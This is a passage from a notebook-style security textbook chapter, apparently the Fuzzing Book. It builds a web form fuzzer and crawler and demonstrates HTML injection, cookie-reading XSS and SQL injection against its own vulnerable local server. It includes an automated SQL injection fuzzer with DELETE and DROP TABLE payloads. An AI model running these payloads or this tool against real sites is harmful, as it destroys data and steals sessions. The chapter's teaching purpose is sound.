...])\n self.fields: Dict[str, List[str]] = {}\n\n # Stack of currently active selection names\n self.select: List[str] = [] ", "_____no_output_____" ] ], [ [ "While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). 
`attributes` gives us a map of associated attributes and values.\n\nHere is how we process the individual tags:\n* When we find a `<form>` tag, we save the associated action in the `action` attribute;\n* When we find an `<input>` tag or similar, we save the type in the `fields` attribute;\n* When we find a `<select>` tag or similar, we push its name on the `select` stack;\n* When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag.", "_____no_output_____" ] ], [ [ "class FormHTMLParser(FormHTMLParser):\n def handle_starttag(self, tag, attrs):\n attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n # print(tag, attributes)\n\n if tag == \"form\":\n self.action = attributes.get(\"action\", \"\")\n\n elif tag == \"select\" or tag == \"datalist\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = []\n self.select.append(name)\n else:\n self.select.append(None)\n\n elif tag == \"option\" and \"multiple\" not in attributes:\n current_select_name = self.select[-1]\n if current_select_name is not None and \"value\" in attributes:\n self.fields[current_select_name].append(attributes[\"value\"])\n\n elif tag == \"input\" or tag == \"option\" or tag == \"textarea\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = attributes.get(\"type\", \"text\")\n\n elif tag == \"button\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = [\"\"]", "_____no_output_____" ], [ "class FormHTMLParser(FormHTMLParser):\n def handle_endtag(self, tag):\n if tag == \"select\":\n self.select.pop()", "_____no_output_____" ] ], [ [ "Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types.", "_____no_output_____" ], [ "Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes a HTML document to parse. It then returns the associated action and the associated fields:", "_____no_output_____" ] ], [ [ "class HTMLGrammarMiner:\n \"\"\"Mine a grammar from a HTML form\"\"\"\n\n def __init__(self, html_text: str) -> None:\n \"\"\"Constructor. `html_text` is the HTML string to parse.\"\"\"\n\n html_parser = FormHTMLParser()\n html_parser.feed(html_text)\n self.fields = html_parser.fields\n self.action = html_parser.action", "_____no_output_____" ] ], [ [ "Applied on our order form, this is what we get:", "_____no_output_____" ] ], [ [ "html_miner = HTMLGrammarMiner(html_text)\nhtml_miner.action", "_____no_output_____" ], [ "html_miner.fields", "_____no_output_____" ] ], [ [ "From this structure, we can now generate a grammar that automatically produces valid form submission URLs.", "_____no_output_____" ], [ "### Mining Grammars for Web Pages", "_____no_output_____" ], [ "To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. 
Our default grammar provides very simple rules for these types.", "_____no_output_____" ] ], [ [ "from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar", "_____no_output_____" ], [ "class HTMLGrammarMiner(HTMLGrammarMiner):\n QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {\n \"<start>\": [\"<action>?<query>\"],\n\n \"<text>\": [\"<string>\"],\n\n \"<number>\": [\"<digits>\"],\n \"<digits>\": [\"<digit>\", \"<digits><digit>\"],\n \"<digit>\": crange('0', '9'),\n\n \"<checkbox>\": [\"<_checkbox>\"],\n \"<_checkbox>\": [\"on\", \"off\"],\n\n \"<email>\": [\"<_email>\"],\n \"<_email>\": [cgi_encode(\"<string>@<string>\", \"<>\")],\n\n # Use a fixed password in case we need to repeat it\n \"<password>\": [\"<_password>\"],\n \"<_password>\": [\"abcABC.123\"],\n\n # Stick to printable characters to avoid logging problems\n \"<percent>\": [\"%<hexdigit-1><hexdigit>\"],\n \"<hexdigit-1>\": srange(\"34567\"),\n\n # Submissions:\n \"<submit>\": [\"\"]\n })", "_____no_output_____" ] ], [ [ "Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type.", "_____no_output_____" ] ], [ [ "class HTMLGrammarMiner(HTMLGrammarMiner):\n def mine_grammar(self) -> Grammar:\n \"\"\"Extract a grammar from the given HTML text\"\"\"\n\n grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)\n grammar[\"<action>\"] = [self.action]\n\n query = \"\"\n for field in self.fields:\n field_symbol = new_symbol(grammar, \"<\" + field + \">\")\n field_type = self.fields[field]\n\n if query != \"\":\n query += \"&\"\n query += field_symbol\n\n if isinstance(field_type, str):\n field_type_symbol = \"<\" + field_type + \">\"\n grammar[field_symbol] = [field + \"=\" + field_type_symbol]\n if field_type_symbol not in grammar:\n # Unknown type\n grammar[field_type_symbol] = [\"<text>\"]\n else:\n # List of values\n value_symbol = new_symbol(grammar, \"<\" + field + \"-value>\")\n grammar[field_symbol] = [field + \"=\" + value_symbol]\n grammar[value_symbol] = field_type # type: ignore\n\n grammar[\"<query>\"] = [query]\n\n # Remove unused parts\n for nonterminal in unreachable_nonterminals(grammar):\n del grammar[nonterminal]\n\n assert is_valid_grammar(grammar)\n\n return grammar", "_____no_output_____" ] ], [ [ "Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar:", "_____no_output_____" ] ], [ [ "html_miner = HTMLGrammarMiner(html_text)\ngrammar = html_miner.mine_grammar()\ngrammar", "_____no_output_____" ] ], [ [ "Let us take a look into the structure of the grammar. It produces URL paths of this form:", "_____no_output_____" ] ], [ [ "grammar[\"<start>\"]", "_____no_output_____" ] ], [ [ "Here, the `<action>` comes from the `action` attribute of the HTML form:", "_____no_output_____" ] ], [ [ "grammar[\"<action>\"]", "_____no_output_____" ] ], [ [ "The `<query>` is composed from the individual field items:", "_____no_output_____" ] ], [ [ "grammar[\"<query>\"]", "_____no_output_____" ] ], [ [ "Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar:", "_____no_output_____" ] ], [ [ "grammar[\"<zip>\"]", "_____no_output_____" ], [ "grammar[\"<terms>\"]", "_____no_output_____" ] ], [ [ "These are the query URLs produced from the grammar. 
We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random:", "_____no_output_____" ] ], [ [ "order_fuzzer = GrammarFuzzer(grammar)\n[order_fuzzer.fuzz() for i in range(3)]", "_____no_output_____" ] ], [ [ "We can again feed these directly into our Web browser:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))", "_____no_output_____" ] ], [ [ "We see (one more time) that we can mine a grammar automatically from given data.", "_____no_output_____" ], [ "### A Fuzzer for Web Forms\n\nTo make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it.", "_____no_output_____" ] ], [ [ "class WebFormFuzzer(GrammarFuzzer):\n \"\"\"A Fuzzer for Web forms\"\"\"\n\n def __init__(self, url: str, *,\n grammar_miner_class: Optional[type] = None,\n **grammar_fuzzer_options):\n \"\"\"Constructor.\n `url` - the URL of the Web form to fuzz.\n `grammar_miner_class` - the class of the grammar miner\n to use (default: `HTMLGrammarMiner`)\n Other keyword arguments are passed to the `GrammarFuzzer` constructor\n \"\"\"\n\n if grammar_miner_class is None:\n grammar_miner_class = HTMLGrammarMiner\n self.grammar_miner_class = grammar_miner_class\n\n # We first extract the HTML form and its grammar...\n html_text = self.get_html(url)\n grammar = self.get_grammar(html_text)\n\n # ... and then initialize the `GrammarFuzzer` superclass with it\n super().__init__(grammar, **grammar_fuzzer_options)\n\n def get_html(self, url: str):\n \"\"\"Retrieve the HTML text for the given URL `url`.\n To be overloaded in subclasses.\"\"\"\n return requests.get(url).text\n\n def get_grammar(self, html_text: str):\n \"\"\"Obtain the grammar for the given HTML `html_text`.\n To be overloaded in subclasses.\"\"\"\n grammar_miner = self.grammar_miner_class(html_text)\n return grammar_miner.mine_grammar()", "_____no_output_____" ] ], [ [ "All it now takes to fuzz a Web form is to provide its URL:", "_____no_output_____" ] ], [ [ "web_form_fuzzer = WebFormFuzzer(httpd_url)\nweb_form_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server:", "_____no_output_____" ] ], [ [ "web_form_runner = WebRunner(httpd_url)\nweb_form_fuzzer.runs(web_form_runner, 10)", "_____no_output_____" ] ], [ [ "While convenient to use, this fuzzer is still very rudimentary:\n\n* It is limited to one form per page.\n* It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions.\n* The fuzzer is build on HTML only. There is no Javascript handling for dynamic Web pages.", "_____no_output_____" ], [ "Let us clear any pending messages before we get to the next section:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ] ], [ [ "## Crawling User Interfaces", "_____no_output_____" ], [ "So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page.", "_____no_output_____" ], [ "Our crawler is pretty straightforward. 
Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form\n\n```html\n<a href=\"<link>\">\n```\n\nand saves all the links found in a list called `links`.", "_____no_output_____" ] ], [ [ "class LinkHTMLParser(HTMLParser):\n \"\"\"Parse all links found in a HTML page\"\"\"\n\n def reset(self):\n super().reset()\n self.links = []\n\n def handle_starttag(self, tag, attrs):\n attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n\n if tag == \"a\" and \"href\" in attributes:\n # print(\"Found:\", tag, attributes)\n self.links.append(attributes[\"href\"])", "_____no_output_____" ] ], [ [ "The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan.", "_____no_output_____" ], [ "### Excursion: Implementing a Crawler", "_____no_output_____" ] ], [ [ "from collections import deque\nimport urllib.robotparser", "_____no_output_____" ], [ "def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):\n \"\"\"Return the list of linked URLs from the given URL.\n `max_pages` - the maximum number of pages accessed.\n `same_host` - if True (default), stay on the same host\"\"\"\n\n pages = deque([(url, \"<param>\")])\n urls_seen = set()\n\n rp = urllib.robotparser.RobotFileParser()\n rp.set_url(urljoin(url, \"/robots.txt\"))\n rp.read()\n\n while len(pages) > 0 and max_pages > 0:\n page, referrer = pages.popleft()\n if not rp.can_fetch(\"*\", page):\n # Disallowed by robots.txt\n continue\n\n r = requests.get(page)\n max_pages -= 1\n\n if r.status_code != HTTPStatus.OK:\n print(\"Error \" + repr(r.status_code) + \": \" + page,\n \"(referenced from \" + referrer + \")\",\n file=sys.stderr)\n continue\n\n content_type = r.headers[\"content-type\"]\n if not content_type.startswith(\"text/html\"):\n continue\n\n parser = LinkHTMLParser()\n parser.feed(r.text)\n\n for link in parser.links:\n target_url = urljoin(page, link)\n if same_host and urlsplit(\n target_url).hostname != urlsplit(url).hostname:\n # Different host\n continue\n\n if urlsplit(target_url).fragment != \"\":\n # Ignore #fragments\n continue\n\n if target_url not in urls_seen:\n pages.append((target_url, page))\n urls_seen.add(target_url)\n yield target_url\n\n if page not in urls_seen:\n urls_seen.add(page)\n yield page", "_____no_output_____" ] ], [ [ "### End of Excursion", "_____no_output_____" ], [ "We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page.", "_____no_output_____" ] ], [ [ "for url in crawl(httpd_url):\n print_httpd_messages()\n print_url(url)", "_____no_output_____" ] ], [ [ "We can also crawl over other sites, such as the home page of this project.", "_____no_output_____" ] ], [ [ "for url in crawl(\"https://www.fuzzingbook.org/\"):\n print_url(url)", "_____no_output_____" ] ], [ [ "Once we have crawled over all the links of a site, we can generate tests for all the forms we found:", "_____no_output_____" ] ], [ [ "for url in crawl(httpd_url, max_pages=float('inf')):\n web_form_fuzzer = WebFormFuzzer(url)\n web_form_runner = WebRunner(url)\n print(web_form_fuzzer.run(web_form_runner))", "('http://127.0.0.1:8800/terms', 
'PASS')\n('http://127.0.0.1:8800/order?item=tshirt&name=+&email=b+%742%40+&city=%45%39&zip=54&terms=on&submit=', 'PASS')\n('http://127.0.0.1:8800/order?item=drill&name=%52-&email=e%40%3f&city=+&zip=5&terms=on&submit=', 'PASS')\n" ] ], [ [ "For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise.", "_____no_output_____" ], [ "Let us get rid of any server messages accumulated above:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ] ], [ [ "## Crafting Web Attacks\n\nBefore we close the chapter, let us take a look at a special class of \"uncommon\" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them.", "_____no_output_____" ], [ "### HTML Injection Attacks\n\nThe first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages.", "_____no_output_____" ], [ "Here is an example of a (simple) HTML injection. For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site.", "_____no_output_____" ] ], [ [ "from Grammars import extend_grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode('''\n Jane Doe<p>\n <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\n </p>\n ''')],\n})", "_____no_output_____" ] ], [ [ "If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded in:", "_____no_output_____" ] ], [ [ "html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)\norder_with_injected_html = html_injection_fuzzer.fuzz()\norder_with_injected_html", "_____no_output_____" ] ], [ [ "What hapens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as link. This also happens in the log:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))", "_____no_output_____" ] ], [ [ "Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders WHERE name LIKE '%<%'\").fetchall())", "[('drill', '\\n Jane Doe<p>\\n <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n </p>\\n ', '[email protected]', 'Seattle', '02805')]\n" ] ], [ [ "This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. 
By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted.", "_____no_output_____" ], [ "### Cross-Site Scripting Attacks\n\nIf one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. This code would then be executed as soon as the injected HTML is rendered. \n\nThis is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin.\n\nIn such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers.", "_____no_output_____" ], [ "Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to \"steal\" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session.", "_____no_output_____" ] ], [ [ "ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode('Jane Doe' +\n '<script>' +\n 'document.title = document.cookie.substring(0, 10);' +\n '</script>')\n ],\n})", "_____no_output_____" ], [ "xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)\norder_with_injected_xss = xss_injection_fuzzer.fuzz()\norder_with_injected_xss", "_____no_output_____" ], [ "url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)\nurl_with_injected_xss", "_____no_output_____" ], [ "HTML(webbrowser(url_with_injected_xss, mute=True))", "_____no_output_____" ] ], [ [ "The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your \"secret\" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to highjack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with Jane Doe's name is shown in the browser and the associated script is executed.", "_____no_output_____" ], [ "Let us go and reset the title to a less sensitive value:", "_____no_output_____" ] ], [ [ "HTML('<script>document.title = \"Jupyter\"</script>')", "_____no_output_____" ] ], [ [ "### SQL Injection Attacks\n\nCross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. 
So-called *SQL injection* targets _databases_, allowing to inject commands that can read or modify data in the database, or change the purpose of the original query.", "_____no_output_____" ], [ "To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database:\n\n```python\nsql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\n```\n\nWhat happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`.", "_____no_output_____" ], [ "Let us illustrate this by an example. We set the individual values as they would be found during execution:", "_____no_output_____" ] ], [ [ "values: Dict[str, str] = {\n \"item\": \"tshirt\",\n \"name\": \"Jane Doe\",\n \"email\": \"[email protected]\",\n \"city\": \"Seattle\",\n \"zip\": \"98104\"\n}", "_____no_output_____" ] ], [ [ "and format the string as seen above:", "_____no_output_____" ] ], [ [ "sql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\nsql_command", "_____no_output_____" ] ], [ [ "All fine, right? But now, we define a very \"special\" name that can also be interpreted as a SQL command:", "_____no_output_____" ] ], [ [ "values[\"name\"] = \"Jane', 'x', 'x', 'x'); DELETE FROM orders; -- \"", "_____no_output_____" ], [ "sql_command = (\"INSERT INTO orders \" +\n \"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values))\nsql_command", "_____no_output_____" ] ], [ [ "What happens here is that we now get a command to insert values into the database (with a few \"dummy\" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more.", "_____no_output_____" ], [ "Is our server also vulnerable to such attacks? Of course it is. 
We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above.", "_____no_output_____" ] ], [ [ "from Grammars import extend_grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode(\"Jane', 'x', 'x', 'x'); DELETE FROM orders; --\")],\n})", "_____no_output_____" ], [ "sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)\norder_with_injected_sql = sql_injection_fuzzer.fuzz()\norder_with_injected_sql", "_____no_output_____" ] ], [ [ "These are the current orders:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104'), ('lockset', 'Jane Doe', '[email protected]', 'Seattle', '16631'), ('drill', 'Jane Doe', '[email protected]', '', '45732'), ('drill', 'Jane Doe', 'j,[email protected]', 'Seattle', '45732'), ('drill', ' ', '5F @p a ', 'cdb', '3230'), ('drill', ' m', '@@0', 'd', '9'), ('lockset', ' ', 'c@d', '_', '6'), ('lockset', ' ', 'd@_-', '2 0', '1040'), ('tshirt', 'Kb', 'm@ ', 'zy ', '13'), ('lockset', 'd', 'U @t', ' ', '4'), ('tshirt', '_ 2', '1 @ ', ' ', '30'), ('tshirt', ' ', 'a-@ ', ' W', '2'), ('lockset', 'V', ' @aUeeD', ' ', '01'), ('tshirt', 'oc', ' @ ', 'a', '25'), ('drill', '55', '3>@@5', 'L', '0'), ('tshirt', ' ', 'b t2@ ', 'E9', '54'), ('drill', 'R-', 'e@?', ' ', '5'), ('drill', '\\n Jane Doe<p>\\n <strong><a href=\"www.lots.of.malware\">Click here for cute cat pictures!</a></strong>\\n </p>\\n ', '[email protected]', 'Seattle', '02805'), ('lockset', 'Jane Doe<script>document.title = document.cookie.substring(0, 10);</script>', '[email protected]', 'Seattle', '34506')]\n" ] ], [ [ "Let us go and send our URL with SQL injection to the server. From the log, we see that the \"malicious\" SQL command is formed just as sketched above, and executed, too.", "_____no_output_____" ] ], [ [ "contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))", "_____no_output_____" ] ], [ [ "All orders are now gone:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/):", "_____no_output_____" ], [ "![https://xkcd.com/327/](PICS/xkcd_exploits_of_a_mom.png){width=100%}", "_____no_output_____" ], [ "Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains.", "_____no_output_____" ], [ "To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do.", "_____no_output_____" ], [ "### Leaking Internal Information\n\nTo craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? 
Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need:", "_____no_output_____" ] ], [ [ "answer = webbrowser(urljoin(httpd_url, \"/order\"), mute=True)", "_____no_output_____" ], [ "HTML(answer)", "_____no_output_____" ] ], [ [ "The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, _make it hard for the attacker to establish a link between the attack and the failure._ In particular,\n\n* Do not produce \"internal error\" messages (and certainly not ones with internal information).\n* Do not become unresponsive; just go back to the home page and ask the user to supply correct data.\n\nOne more time, the [exercises](#Exercises) give some instructions on how to fix the server.", "_____no_output_____" ], [ "If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges.", "_____no_output_____" ], [ "## Fully Automatic Web Attacks", "_____no_output_____" ], [ "So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks:", "_____no_output_____" ] ], [ [ "class SQLInjectionGrammarMiner(HTMLGrammarMiner):\n \"\"\"Demonstration of an automatic SQL Injection attack grammar miner\"\"\"\n\n # Some common attack schemes\n ATTACKS: List[str] = [\n \"<string>' <sql-values>); <sql-payload>; <sql-comment>\",\n \"<string>' <sql-comment>\",\n \"' OR 1=1<sql-comment>'\",\n \"<number> OR 1=1\",\n ]\n\n def __init__(self, html_text: str, sql_payload: str):\n \"\"\"Constructor.\n `html_text` - the HTML form to be attacked\n `sql_payload` - the SQL command to be executed\n \"\"\"\n super().__init__(html_text)\n\n self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {\n \"<text>\": [\"<string>\", \"<sql-injection-attack>\"],\n \"<number>\": [\"<digits>\", \"<sql-injection-attack>\"],\n \"<checkbox>\": [\"<_checkbox>\", \"<sql-injection-attack>\"],\n \"<email>\": [\"<_email>\", \"<sql-injection-attack>\"],\n \"<sql-injection-attack>\": [\n cgi_encode(attack, \"<->\") for attack in self.ATTACKS\n ],\n \"<sql-values>\": [\"\", cgi_encode(\"<sql-values>, '<string>'\", \"<->\")],\n \"<sql-payload>\": [cgi_encode(sql_payload)],\n \"<sql-comment>\": [\"--\", \"#\"],\n })", "_____no_output_____" ], [ "html_miner = SQLInjectionGrammarMiner(\n html_text, sql_payload=\"DROP TABLE orders\")", "_____no_output_____" ], [ "grammar = html_miner.mine_grammar()\ngrammar", "_____no_output_____" ], [ "grammar[\"<text>\"]", "_____no_output_____" ] ], [ [ "We see that several fields now are tested for vulnerabilities:", "_____no_output_____" ] ], [ [ "sql_fuzzer = GrammarFuzzer(grammar)\nsql_fuzzer.fuzz()", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ], [ "contents = webbrowser(urljoin(httpd_url,\n \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))", "_____no_output_____" ], [ "def orders_db_is_empty():\n \"\"\"Return True if the orders database 
is empty (= we have been successful)\"\"\"\n\n try:\n entries = db.execute(\"SELECT * FROM orders\").fetchall()\n except sqlite3.OperationalError:\n return True\n return len(entries) == 0", "_____no_output_____" ], [ "orders_db_is_empty()", "_____no_output_____" ] ], [ [ "We create a `SQLInjectionFuzzer` that does it all automatically.", "_____no_output_____" ] ], [ [ "class SQLInjectionFuzzer(WebFormFuzzer):\n \"\"\"Simple demonstrator of a SQL Injection Fuzzer\"\"\"\n\n def __init__(self, url: str, sql_payload : str =\"\", *,\n sql_injection_grammar_miner_class: Optional[type] = None,\n **kwargs):\n \"\"\"Constructor.\n `url` - the Web page (with a form) to retrieve\n `sql_payload` - the SQL command to execute\n `sql_injection_grammar_miner_class` - the miner to be used\n (default: SQLInjectionGrammarMiner)\n Other keyword arguments are passed to `WebFormFuzzer`.\n \"\"\"\n self.sql_payload = sql_payload\n\n if sql_injection_grammar_miner_class is None:\n sql_injection_grammar_miner_class = SQLInjectionGrammarMiner\n self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class\n\n super().__init__(url, **kwargs)\n\n def get_grammar(self, html_text):\n \"\"\"Obtain a grammar with SQL injection commands\"\"\"\n\n grammar_miner = self.sql_injection_grammar_miner_class(\n html_text, sql_payload=self.sql_payload)\n return grammar_miner.mine_grammar()", "_____no_output_____" ], [ "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\nweb_runner = WebRunner(httpd_url)\ntrials = 1\n\nwhile True:\n sql_fuzzer.run(web_runner)\n if orders_db_is_empty():\n break\n trials += 1", "_____no_output_____" ], [ "trials", "_____no_output_____" ] ], [ [ "Our attack was successful! After less than a second of testing, our database is empty:", "_____no_output_____" ] ], [ [ "orders_db_is_empty()", "_____no_output_____" ] ], [ [ "Again, note the level of possible automation: We can\n\n* Crawl the Web pages of a host for possible forms\n* Automatically identify form fields and possible values\n* Inject SQL (or HTML, or JavaScript) into any of these fields\n\nand all of this fully automatically, not needing anything but the URL of the site.", "_____no_output_____" ], [ "The bad news is that with a tool set as the above, anyone can attack web sites. The even worse news is that such penetration tests take place every day, on every web site. The good news, though, is that after reading this chapter, you now get an idea of how Web servers are attacked every day – and what you as a Web server maintainer could and should do to prevent this.", "_____no_output_____" ], [ "## Synopsis\n\nThis chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.", "_____no_output_____" ], [ "### Fuzzing Web Forms\n\n`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. 
Support is limited to GET forms and a subset of HTML form elements.", "_____no_output_____" ], [ "Here's the grammar extracted for our vulnerable Web server:", "_____no_output_____" ] ], [ [ "web_form_fuzzer = WebFormFuzzer(httpd_url)", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<start>']", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<action>']", "_____no_output_____" ], [ "web_form_fuzzer.grammar['<query>']", "_____no_output_____" ] ], [ [ "Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.", "_____no_output_____" ] ], [ [ "web_form_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.", "_____no_output_____" ], [ "Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.", "_____no_output_____" ], [ "### SQL Injection Attacks\n\n`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:", "_____no_output_____" ] ], [ [ "sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\nsql_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "As you can see, the path to be retrieved contains the payload encoded into one of the form field values.", "_____no_output_____" ], [ "Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.", "_____no_output_____" ], [ "`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.", "_____no_output_____" ] ], [ [ "# ignore\nfrom ClassDiagram import display_class_hierarchy\nfrom Fuzzer import Fuzzer, 